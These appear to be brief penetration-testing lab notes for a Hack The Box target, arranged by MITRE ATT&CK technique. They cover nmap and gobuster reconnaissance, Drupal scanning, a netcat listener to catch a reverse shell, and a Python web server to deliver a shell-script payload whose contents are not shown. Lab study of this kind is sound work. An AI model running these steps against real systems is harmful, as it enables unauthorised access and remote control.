Network Service Discovery: T1046
echo "targetip" > target.txt
nmap -sC -sV -Pn -oA nmap -iL target.txt
Active Scanning: Wordlist Scanning: T1595.003
echo "10.129.129.* websitename.htb" | sudo tee -a /etc/hosts
gobuster vhost -w ~/Desktop/Useful\ Repos/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://website.htb
If you don't have SecList installed
git clone https://github.com/danielmiessler/SecLists.git
note that with pwnbox its found on the desktop
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir --url http://website.htb -t 20
cd opt/droopescan
./droopescan scan drupal -u 10.129.147.*
http://10.129.147.*/CHANGELOG.txt
Develop Capabilities: Malware: T1587.001
simple shell code script
ip addr
change the ip to the ipadress of your machine
vim shell.sh
Netcat listener
Open another terminal and run a Netcat listener
nc -nvlp 1337
Stage Capabilities: Upload Malware: T1608.001
Simple python webserver
In order to deliver our shell script use a simple http server
python3 -m http.server 8000
Drive-by Compromise: T1189
Burpsuite